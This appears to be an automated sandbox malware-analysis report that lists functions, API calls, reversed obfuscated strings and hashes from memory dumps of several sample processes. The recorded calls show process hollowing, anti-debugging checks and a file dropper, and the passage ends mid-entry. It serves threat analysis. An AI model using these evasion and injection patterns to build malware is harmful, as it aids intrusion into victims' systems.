Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 5d9c0843a8df1351729a99774420b63b7f54d48bf53e0e4bd13fb4fc006abd53
Instruction ID: 23fd59a9d2de1e73cfff21e5b69ebdb96e0a96945ceb5076d180348181cfd7d7
Opcode Fuzzy Hash: 5d9c0843a8df1351729a99774420b63b7f54d48bf53e0e4bd13fb4fc006abd53
Instruction Fuzzy Hash: A51157B5640208BFEB01EFA4DC91E9EF7AEEB49780F514460FA00D7200D674EA048F20

Function 02F38400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02F38471

Strings

yromeMlautriVdaeRtN, xrefs: 02F3841B
ntdll, xrefs: 02F38448

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2004920654-737317276
Opcode ID: 02dfff808805719fd38402e89fcbcc91a78756247c96d8cb4ca1d2cd267019ee
Instruction ID: 9d38635bac0dbbee847ca032a9db086d7a7327ab328b5fda71dd51b7964c62f2
Opcode Fuzzy Hash: 02dfff808805719fd38402e89fcbcc91a78756247c96d8cb4ca1d2cd267019ee
Instruction Fuzzy Hash: A701E9B5640308AFEB01EFA8DC51E9EB7EEEB4D790F514460FA04D7640D678EA148B24

Function 02F37D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02F37DEC

Strings

Ntdll, xrefs: 02F37DC3
yromeMlautriVetirW, xrefs: 02F37D93

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 4260932595-3542721025
Opcode ID: 10285fa49e0c7ce3744db36a83393d9aa80e3c91a7ca099778f01658196b5545
Instruction ID: 2b6f31e2904baec69d7381eb4e59c45d6d2728195816e57c9943919a47eccec8
Opcode Fuzzy Hash: 10285fa49e0c7ce3744db36a83393d9aa80e3c91a7ca099778f01658196b5545
Instruction Fuzzy Hash: C9018CB6640208AFEB02FF99DC42E9EF7EDEB4A780F514850BA04DB600C674ED108F60

Function 02F38670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02F386D5

Strings

ntdll, xrefs: 02F386B8
noitceSfOweiVpamnUtN, xrefs: 02F3868B

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 2801472262-2520021413
Opcode ID: 9d0c61717940cb50759f12d9247140d718725f98b12e471a1ad6df61a1ed80da
Instruction ID: e176a1c9e2db3ae29517cea3ebc9acb8403622302810ecfb81b36a9796869b4d
Opcode Fuzzy Hash: 9d0c61717940cb50759f12d9247140d718725f98b12e471a1ad6df61a1ed80da
Instruction Fuzzy Hash: B401FF75A40308BFEB05FBA5DC51E5EF7AEEB49BC0F514460B600D7640D678E9048E24

Function 02F37AC9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02F37A9F

Strings

ntdll, xrefs: 02F37A74

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: ntdll
API String ID: 2167126740-3337577438
Opcode ID: 2936b0ef33a8c13b8702b9db8ad8ea1e94523d54de71eabacbc7f2e7ebf17f88
Instruction ID: cbafb02c603cb2427f9e3635a044182a8cb542a5cd8c3fc844538fbcda93b7aa
Opcode Fuzzy Hash: 2936b0ef33a8c13b8702b9db8ad8ea1e94523d54de71eabacbc7f2e7ebf17f88
Instruction Fuzzy Hash: F701E8B5640209AFEB05EFA4DC81EAEB7EDEB49790F414465BA05D7200D634EA048B24

Function 02F386F7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02F386D5

Strings

ntdll, xrefs: 02F386B8

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProcSectionUnmapView
String ID: ntdll
API String ID: 2801472262-3337577438
Opcode ID: a3fcb2b0cedbb2e5ce44af57279226a37b4d894479fe92a1b55e4612b9208b02
Instruction ID: 87c22f291969b90a5e1ee38a81a8e77ca422af00fb29d009d43a28c04851bbed
Opcode Fuzzy Hash: a3fcb2b0cedbb2e5ce44af57279226a37b4d894479fe92a1b55e4612b9208b02
Instruction Fuzzy Hash: 51F04975A44208AFEB02FBB4EC4199DFBFAEF897C0B5145A1B64497201DA38AA048F10

Function 02F38788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02F38814

Strings

CreateProcessAsUserW, xrefs: 02F387A1
Kernel32, xrefs: 02F387D3

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressCreateHandleModuleProcProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 4105707577-2353454454
Opcode ID: 4ff71e5a55c9ef60e776f5d80dd1bd842e8785bffa371fd6f21a4a4728d9c129
Instruction ID: c95d5d7f72bccd16d79caa8924766c77eea53b5a5033ba7a4b350f5f4f1eedd0
Opcode Fuzzy Hash: 4ff71e5a55c9ef60e776f5d80dd1bd842e8785bffa371fd6f21a4a4728d9c129
Instruction Fuzzy Hash: 7D11A5B2650248AFEB41EFA9DC41F9E77EDEB4D780F514450BA08D7640C678ED108B65

Function 02F3F744 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02F3F77D

Strings

CheckRemoteDebuggerPresent, xrefs: 02F3F760
KernelBase, xrefs: 02F3F74F

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 3662101638-539270669
Opcode ID: 02578e57b48446376d142e0514c0b2f12948771d392ca0ca2a420d968fd71206
Instruction ID: d7bae1020e426d6368b9bfecb0ae314422665b8d785bb1ccb5f54e5ca273087d
Opcode Fuzzy Hash: 02578e57b48446376d142e0514c0b2f12948771d392ca0ca2a420d968fd71206
Instruction Fuzzy Hash: 52F0E570D0425CFAEB12A7F88C897DDFFB99B09368F2443D0E635A25C1E7714684CA91

Non-executed Functions

Function 02F38338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02F381CC: GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02F383C2), ref: 02F383A4

Strings

Kernel32, xrefs: 02F38383
FlushInstructionCache, xrefs: 02F38351

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressCacheFlushHandleInstructionModuleProc
String ID: FlushInstructionCache$Kernel32
API String ID: 2392256011-184458249
Opcode ID: 628ddb5c1d0ec1febae2c7595146df114c118e9453149f65552db6a88ddaa1ab
Instruction ID: e9d48cd8ad3f02b30763b0d0bd10dabba7c33eb949c1db4b1d3a68439eda5d77
Opcode Fuzzy Hash: 628ddb5c1d0ec1febae2c7595146df114c118e9453149f65552db6a88ddaa1ab
Instruction Fuzzy Hash: D6014B71654308AFE701EEA5DC41F5EB7ADEB09BC0F514460BA00D6640D6B8AE148A24

Function 02F38274 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 02F382D9

Strings

Kernel32, xrefs: 02F382BC
sserddAcorPteG, xrefs: 02F3828F

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressProc
String ID: Kernel32$sserddAcorPteG
API String ID: 190572456-1372893251
Opcode ID: 88bc6477f1cf7e476710751fddc5ec80d0174311b2cbd06965c0cd7938cdb0fd
Instruction ID: 0766c4bfd0c027aabb67e0a65534d087661c543bb5953b1ee0b3c570f89b704d
Opcode Fuzzy Hash: 88bc6477f1cf7e476710751fddc5ec80d0174311b2cbd06965c0cd7938cdb0fd
Instruction Fuzzy Hash: 1D01FFB5640318AFEB05FBA4DC51E9EFBEEEB49B90F514460BA00DB740D6B4A904CE64

Function 02F381CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 02F38274: GetProcAddress.KERNEL32(?,?), ref: 02F382D9

GetModuleHandleA.KERNELBASE(?), ref: 02F3821E

Strings

AeldnaHeludoMteG, xrefs: 02F381E5
KernelBASE, xrefs: 02F38205

Memory Dump Source

Source File: 0000001A.00000002.1607888941.0000000002F21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2f21000_Wisrysxl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1646373207-1952140341
Opcode ID: 077ce40d23137a721d3f10e244ac5a1330ce82d4a546887994d3c79ccfe63eb5
Instruction ID: 9c26d4d7ffd4e529d1aa3efc701dc5c2ecf445a9ae8a28ea108d7c18d9589a6b
Opcode Fuzzy Hash: 077ce40d23137a721d3f10e244ac5a1330ce82d4a546887994d3c79ccfe63eb5
Instruction Fuzzy Hash: C7F04FB1A44704AFE702FBA4DC11D5EF7EDF74A7C07524460BA0097610D674EE148924

Analysis Process: lxsyrsiW.pifPID: 4688, Parent PID: 4024COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`4wD`4w, xrefs: 00401411, 00401414
D`4wD`4w, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 0000001C.00000001.1579201485.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000001.1579201485.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001C.00000001.1579201485.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`4wD`4w$D`4wD`4w
API String ID: 4108700736-3394693991
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Analysis Process: neworigin.exePID: 5072, Parent PID: 4688COMMON

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	148
Total number of Limit Nodes:	23

Executed Functions

Function 06927E78 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06928413
$q, xrefs: 0692841F

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 34387718ea08cf2734f5303d4515fc7efcf29dc16b439bf56d82dc9086bad3b5
Instruction ID: c21dafbec4bd236354f31c4a15d0906aaf77214b16b53204cc27eed3f84e0fc2
Opcode Fuzzy Hash: 34387718ea08cf2734f5303d4515fc7efcf29dc16b439bf56d82dc9086bad3b5
Instruction Fuzzy Hash: D0029C30B002268FDB54DB68D950BAEB7F6FF84304F248929D4159B799DB71EC86CB90

Function 06922350 Relevance: 1.1, Instructions: 1051COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c2308b3deac3f25d7d8d92bb38ec681d7ae5f3d64dd9dbb0c2f7ecd095dfd4
Instruction ID: 207a7e0008cce8e781ec58ea7a8bcf324e9526d31ce955902ca8df04b9209195
Opcode Fuzzy Hash: b5c2308b3deac3f25d7d8d92bb38ec681d7ae5f3d64dd9dbb0c2f7ecd095dfd4
Instruction Fuzzy Hash: 43A26434A002158FDBA4CF68C584B9DB7F6EB49314F6884A9D409DB769DB34EE85CF40

Function 069266E8 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89af4ade80311df2fffb30fe18951702411e86dac51e1e7598e2cb3e0b5edfac
Instruction ID: 8b8d2311e1a5ae8a1f97d998dea61c56386d94a5e1f7d92e79cb9fd1d887bb65
Opcode Fuzzy Hash: 89af4ade80311df2fffb30fe18951702411e86dac51e1e7598e2cb3e0b5edfac
Instruction Fuzzy Hash: 0662BD30A002269FDB54DB68D590BADB7F6FF88314F248469E406EBB58DB35EC45CB90

Function 0692C2A0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ef29d7ba8b8f14c63da90113eff600738e1bc449e3bd203cbd15fe91184f0e
Instruction ID: a551f1a4dd7bd6499ae89418d9c4100a6ff766fdef6edf6b9c1a2ea957b9bb76
Opcode Fuzzy Hash: 81ef29d7ba8b8f14c63da90113eff600738e1bc449e3bd203cbd15fe91184f0e
Instruction Fuzzy Hash: 7032C130B0021ADFDB94DB68D890BAEB7B6FB88314F208529D445E7759DB31EC42CB90

Function 069256B8 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f902e5e3ce9934fa9b85b03a0252148a09c43234cd1a51f4b848b357fdec17
Instruction ID: ddbef1cdfb22c21fce9cf62d718c3f9b66c4b98aa27e14695d61dc6c3548f6e9
Opcode Fuzzy Hash: 60f902e5e3ce9934fa9b85b03a0252148a09c43234cd1a51f4b848b357fdec17
Instruction Fuzzy Hash: AA12E775F002269FDF64DB68D8847AEBBBAEF84310F25842AD415DB748DA74EC41CB90

Function 0692B32A Relevance: .6, Instructions: 584COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21d7bd8abb352fdadf28a386d838fd0732ad994acfa9d66e6a5ab9e7c0b2d90
Instruction ID: 374fe00058f3b14e107569358a0cf65f9cfe02525a2bb0df5290373f14196905
Opcode Fuzzy Hash: f21d7bd8abb352fdadf28a386d838fd0732ad994acfa9d66e6a5ab9e7c0b2d90
Instruction Fuzzy Hash: 08227D70E0021A8BEF64DB68D480BADB7F5FB49318F248926E455DBB8DCA34DC81CB51

Function 06929250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 069292A3
$q, xrefs: 06929297
$q, xrefs: 069292D2
$q, xrefs: 069292DE

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 06be55f83e13701d243f71fd979e913bc57082b5c0907afd916b2d186a3c7757
Instruction ID: 01462443a4a5f7a313a92bce6e33f9e13269009fd3767dfb3ba238ce1e1d099f
Opcode Fuzzy Hash: 06be55f83e13701d243f71fd979e913bc57082b5c0907afd916b2d186a3c7757
Instruction Fuzzy Hash: DB91B271B4021A8FDB64DB69D890BAE77F6FF88304F108569C809EB758EE70DD418B90

Function 06929241 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06929297
$q, xrefs: 069292D2

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 321f329898a2d41525c019543a85757ba1bf0beac1d5966d35af7adcbd7f86ef
Instruction ID: 9780c51b5e31715107d839531514ffe07d654df8e03bd4fd720b6fbfd02aed12
Opcode Fuzzy Hash: 321f329898a2d41525c019543a85757ba1bf0beac1d5966d35af7adcbd7f86ef
Instruction Fuzzy Hash: CA514E71B402199FDB54DB79D8A0BAE77F6BF88304F148569C809DB758EA70DC028B91

Function 0116EF08 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001D.00000002.3788249290.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1160000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a1fc79bd96ef71094207fdfe477dca362d34d11fbf158bd9fce11ad4c815ef
Instruction ID: a070bc6722e709df0d767b4055204ac695dcee66a6fbb4fa288cb9c71014bead
Opcode Fuzzy Hash: 02a1fc79bd96ef71094207fdfe477dca362d34d11fbf158bd9fce11ad4c815ef
Instruction Fuzzy Hash: 61412072D0035A9FDB14DF69D8002EEBBF5EF89310F18866AD944A7241EB749845CBA1

Function 0116EFF0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 0116F057

Memory Dump Source

Source File: 0000001D.00000002.3788249290.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

